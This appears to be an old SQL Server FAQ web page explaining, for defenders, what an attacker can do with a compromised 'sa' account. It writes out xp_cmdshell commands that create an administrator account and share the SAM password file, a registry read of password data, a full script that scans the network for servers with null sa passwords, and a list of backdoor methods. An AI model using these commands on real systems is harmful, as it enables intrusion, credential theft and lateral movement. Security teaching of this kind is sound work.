What could happen if the 'sa' account is compromised?

Email to friend

Add comment

Votes: 1

Comments: 0

Say someone has compromised an account with execute rights to the xp_cmdshell extended stored procedure (such as 'sa') using a dictionary attack, social engineering, packet sniffing, trojans, keystroke recorders, or simple guessing. The next step is to compromise the OS. This might include firing up the xp_cmdshell stored procedure and typing:

Xp_cmdshell 'net user testuser UgotHacked /ADD'

Then:

Xp_cmdshell 'net localgroup Administrators testuser /ADD'

Note: In SQL 7.0, non-sys admin role users get SQLAgentCmdExec user context by default, so this exploit won’t work unless sa is compromised. Some may argue that once a person compromises the Administrator account, then talking about things they can do is a waste of time. The point is that sa isn’t Administrator; sa is a SQL Server security model member, and its exploitation can lead to a compromise of other security models such as NT. This is the primary point you should take from this section—the idea that attackers can take advantage of a weaker security model to compromise a stronger one.

Now the attacker has an account with local administrator access on your SQL Server machine. (Pray your machine isn’t a domain controller or the user now has domain admin access. Sigh.) While the attackers are there, they just may fire off this query :

Xp_cmdshell 'rdisk /s-'

This effectively rebuilds the information in the \winnt\repair directory without prompting the user.

After backing up the SAM (sam._ in \winnt\repair directory), the attacker can establish an SMB connection to an administrative share or create one:

Xp_cmdshell 'net share getsam=c:\winnt\repair'

Of course, if the SMB ports (UDP 137/138, and TCP 139) are blocked, the attacker will just have to find a Web server with anonymous browsing enabled (or enable it using OLE automation stored procedures), move the file, and use a browser to do his or her dirty work. If that doesn’t work, why not just bcp (bulk copy program) the table into an image field and then use the GetChunk ADO method to pull it over to your machine? How about using the built-in TFTP client to download a Netcat listener to the machine and then configure it to listen and transfer? Be creative — hackers are.

By the way, compromised SQL Servers make excellent launching points for attacks against other machines inside the network. By hopping from server to server it is possible to move virtually undetected through otherwise well-defended networks. Below is an example sql script to enumerate other SQL Servers on the network that have null 'sa' accounts.

-- Create temp table to store enumerated servers

SET NOCOUNT ON

CREATE TABLE #temp (shelldump varchar(255))

INSERT #temp EXEC xp_cmdshell 'osql -L'

DECLARE @current_server varchar(255), @conn_string varchar(255)

DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp

OPEN sql_cursor FETCH NEXT FROM sql_cursor INTO @current_server

-- Loop through potential targets and check for null sa accounts

-- If target is vulnerable, version information will be displayed

WHILE @@FETCH_STATUS = 0

BEGIN

If @current_server <> 'Servers:'

BEGIN

SELECT @current_server = rtrim(ltrim(@current_server))

SELECT @conn_string = 'exec master..xp_cmdshell ''osql -S' + @current_server + ' -Usa -P -Q "select @@version"'''

PRINT 'Attempting connection to server: ' + @current_server

EXECUTE (@conn_string)

PRINT '====================================================================='

END

FETCH NEXT FROM sql_cursor INTO @current_server

END

--Clean up

CLOSE sql_cursor

DEALLOCATE sql_cursor

DROP TABLE #TEMP

As the above code shows, a compromised SQL Server can be turned into an unwilling participant in more attacks. Even better for the attacker, subsequent probes/intrusions lanuched from this server will mask the fiend since logs will show the compromised SQL Server to be the source of future suspicious activity.

What if you were smart and disabled the xp_cmdshell extended stored procedure ? Now where do we go? Try this little gem:

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

If the MSSqlserver service is running under the LocalSystem account, then this call can return an encrypted password or SID right out of the registry. (David LeBlanc - a frequent posted to ntbugtraq - has correctly pointed out that this will only work on machines without SYSKEY installed.)

These are just a few brief samples of exploits that can be performed against an unsecured server. Make sure you audit your own systems to ensure that these and other exploits don’t compromise your security.

So what? They get into the SQL Server, how does this affect my network?

Once the system is compromised, it’s likely the intruder will put backdoors in place to gain access to other systems, and to make sure he or she can get to this box again incase you read this article and implement changes. Some examples include the following:

Modifying the sp_password stored procedure to capture passwords when users attempt to change their passwords.
Installing popular shareware/freeware tools such as Netbus or BackOriface on the server so the attacker can access the box in other ways even if SQL is patched. I include this because Administrator access isn’t required for many of these trojans, and SQL Server can make an excellent delivery mechanism.
Exploiting holes in other services on the machine through OLE Automation. A popular example is an exploit of IIS that allows the attacker to modify the server to allow anonymous access to a secured Web site.
Installing remote control utilities on the server (through IIS, xp_cmdshell, schedule service, etc.) to gain control of the machine.
Adding stored procedures to sp_makestartup to allow the attacker to run stored procs when the server is started and use the server’s security context.
Placing entries in the registry using extended stored procs or “regedit /s filename.reg” at the command line. These entries could open null user holes or run scripts at certain times to allow for more access. With registry access at the administrator level, the attacker has total control.

You need to secure SQL Server before it goes into production. If it’s too late for this, then do your best to look for these trojans and remove them. Good logging will help you to monitor access and see who is using the server in ways they shouldn’t.

Others in this Category

	How to change the owner of all tables in a database?
	how to build connection string for MS SQL Server?
	How we can back up all databases in SQL Server
	If the TempDB Database is deleted from MS-SQL Server what will happen..?
	How to insert a not null column in an existing table with records..?
	If a table is deleted, what will happen for the Stored procedures and Views, which that table reffered..?
	Is there an easy way to loop through every stored procedure in a database and create a file containing all of the SP code?
	What is denormalization and when would you go for it?
	How do you implement one-to-one, one-to-many and many-to-many relationships while designing tables?
	What's the difference between a primary key and a unique key?
	What are user defined datatypes and when you should go for them?
	What is bit datatype and what's the information that can be stored inside a bit column?
	How we can determine which version of SQL Server 2005 is running?
	How to determine which version of SQL Server 2000 is running
	What are cursors? Explain different types of cursors. What are the disadvantages of cursors? How can you avoid cursors?
	Can you have a nested transaction?
	What is an extended stored procedure? Can you instantiate a COM object by using T-SQL?
	You have just had to restore from backup and do not have any control files. How would you go about bringing up this database?
	Is length of sql query limited in MS_SQL Server ?
	Where we can find Free MS SQL Server System Table chart or map ?
	I'm using SQL Server 2005. Do I need to get Enterprise Manager to administer the app through a hosted server? What do I need if not EM?
	How do I restict clients by IP Address?
	How do I perform encryption with SQL Server?
	What is SQLPing and how does it work?
	How can I hide my SQL Server 2000 installations from SQLPing?
	How can I keep the 'sa' account from reading my confidential data?
	Why is SQL Server security important?
	What different network protocol libraries should I use?
	What different network protocol libraries should I use?
	What are the various security modes for SQL Server and how do they work?
	What are some things I can do to secure my SQL Server?
	Does MySQL 5.0 provide any new features/capabilities for MySQL Cluster?
	Can you use MySQL GUI Tools to build Stored Procedures and Views?
	How does PostgreSQL compare to other DBMSs?
	How we can perform MINUS (Oracle) Or EXCEPT (Maxdb) in MS Access?
	What is normalization?
	What is a Stored Procedure?
	Can you give an example of Stored Procedure?
	What is a trigger?
	What is a view?
	What is an Index?
	What are the types of indexes available with SQL Server?
	What is the basic difference between clustered and a non-clustered index?
	What are cursors?
	When do we use the UPDATE_STATISTICS command?
	Which TCP/IP port does SQL Server run on?
	From where can you change the default port?
	Can you tell me the difference between DELETE & TRUNCATE commands?
	Can we use Truncate command on a table which is referenced by FOREIGN KEY?
	What is the use of DBCC commands?
	Can you give me some DBCC command options?
	What command do we use to rename a db?
	Well sometimes sp_reanmedb may not work you know because if some one is using the db it will not accept this command so what do you think you can do in such cases?
	What is the difference between a HAVING CLAUSE and a WHERE CLAUSE?
	What do you mean by COLLATION?
	What is a Join in SQL Server?
	Can you explain the types of Joins that we can have with Sql Server?
	When do you use SQL Profiler?
	What is a Linked Server?
	Can you link only other SQL Servers or any database servers such as Oracle?
	Which stored procedure will you be running to add a linked server?
	What are the OS services that the SQL Server installation adds?
	Can you explain the role of each service?
	How do you troubleshoot SQL Server if its running very slow?
	Lets say due to N/W or Security issues client is not able to connect to server or vice versa. How do you troubleshoot?
	What are the authentication modes in SQL Server? -
	Where do you think the users names and passwords will be stored in sql server?
	What is log shipping? Can we do logshipping with SQL Server 7.0
	Let us say the SQL Server crashed and you are rebuilding the databases including the master database what procedure to you follow?
	Let us say master db itself has no backup. Now you have to rebuild the db so what kind of action do you take?
	What is BCP? When do we use it?
	What should we do to copy the tables, schema and views from one SQL Server to another?
	What are the different types of joins and what does each do?
	What is a sub-query? When would you use one?
	Hacking SQL Server!!!
	When do you use SQL Profiler?
	What is a Linked Server?
	Can you link only other SQL Servers or any database servers such as Oracle?
	Which stored procedure will you be running to add a linked server?
	What are the OS services that the SQL Server installation adds?
	Can you explain the role of each service?
	How do you troubleshoot SQL Server if its running very slow?
	What are the authentication modes in SQL Server?
	Where do you think the users names and passwords will be stored in sql server?
	What is log shipping?
	What is BCP?
	What is Data Mapping
	What is an Ad Hoc Query?
	How to identify your SQL Server version and edition?
	what is the method to change location of tempdb?
	How to know which index a table is using?
	What is Data page?
	Define Disaster recovery planning.
	define term Minimally logged operations (bulk load operations)
	What is Filegroup?
	What is Log sequence number (LSN)?
	what is an Extent?
	how we can change ownership in SQL Server?